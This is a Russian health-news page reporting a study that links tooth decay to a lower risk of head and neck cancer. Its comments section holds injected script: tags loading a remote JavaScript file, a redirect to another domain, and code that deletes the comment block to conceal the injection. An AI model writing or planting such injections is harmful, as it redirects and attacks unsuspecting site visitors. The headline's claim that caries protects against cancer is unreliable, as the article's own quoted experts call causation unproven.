Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем хуже зубы, тем меньше...  >>  Чем хуже зубы, тем меньше рака! Кариес защищает от рака шеи!
 
Обратная связь
 

Чем хуже зубы, тем меньше рака! Кариес защищает от рака шеи!

Размер шрифта
04 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

Опубликованы ошеломляющие новости! У людей с кариесом рак органов головы и шеи встречается реже.

Чем хуже зубы, тем меньше рака! Кариес защищает от рака шеи!

Ученые считают, что причиной такого уникального явления могут быть молочнокислые бактерии, которые активно борются с раковыми клетками.  «Для нас эта находка стала весьма неожиданной, так как широко известно, что кариес зубов и пародонтоз считаются признаками плохого прогноза», – говорит ведущий исследователь Нью-Йоркского Университета доктор Тезал.

Она также заметила, что это не означает, что теперь можно не чистить зубы и не посещать стоматолога. Главный вывод данного исследования заключается в соблюдении особого баланса в ротовой полости в том числе за счет отказа от курения и бесконтрольного приема антибактериальных препаратов, нарушения диеты. Здоровый рацион, соблюдение правил гигиены, частое использование зубной щетки и нити, поможет сохранить этот баланс в норме. В исследование было включено 399 пациентов с раком органов головы и шеи и 221 здоровых добровольцев. Исследователи обнаружили, что у людей с меньшим количеством здоровых зубов, риски развития рака органов шеи и головы были на 32% ниже, чем у здоровых. Были исключены факторы риска такие как, пол, возраст, курение и употребление алкоголя. «Важно отметить, что факт отсутствия зубов или наличия кариеса, не был связан с развитием онкологических заболеваний данной области», – говорит Тезал. Кариес вызывают молочнокислые бактерии, стрептококки, актиномицеты и бифидобактерии. «Эти бактерии играют важную роль в пищеварении, улучшают работу слизистых оболочек и влияют на системный иммунитет. Уменьшение их количества может вызвать развитие многих хронических воспалительных заболеваний, аллергических реакций, ожирение и рост раковых клеток», – утверждает доктор.

Изучение свойств этих бактерий может стать пусковым моментом для разработки способов борьбы с опухолями. Тем не менее, доктор Джоэл Эпштейн, представитель Американского общества стоматологов, которая не принимала участия в данном исследовании, обратила внимание, что не были учтены возраст и причины потери зубов. «Авторы не доказали причинно-следственную связь. Кроме того, даже если факт взаимосвязи наличия кариеса и снижения онкориска будет доказан, что маловероятно, не стоит забывать о других сопутствующих кариесу воспалительных реакциях и инфекциях, которые могут привести к развитию более серьезных осложнений», – говорит Эпштейн. Полученные данные требуют более детального изучения на большем количестве пациентов. Другой эксперт, Деннис Краус, директор онкологического центра в Нью-Йорке, постановил, что данные выводы носят предварительный характер, но могут быть использованы в качестве идеи для разработки новых способов профилактики и лечения раковых опухолей органов головы и шеи.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Красивая улыбка – лучший новогодний подарок!   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Почему вам не нравится ваша улыбка на фото?
Бронхит: лицом к лицу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.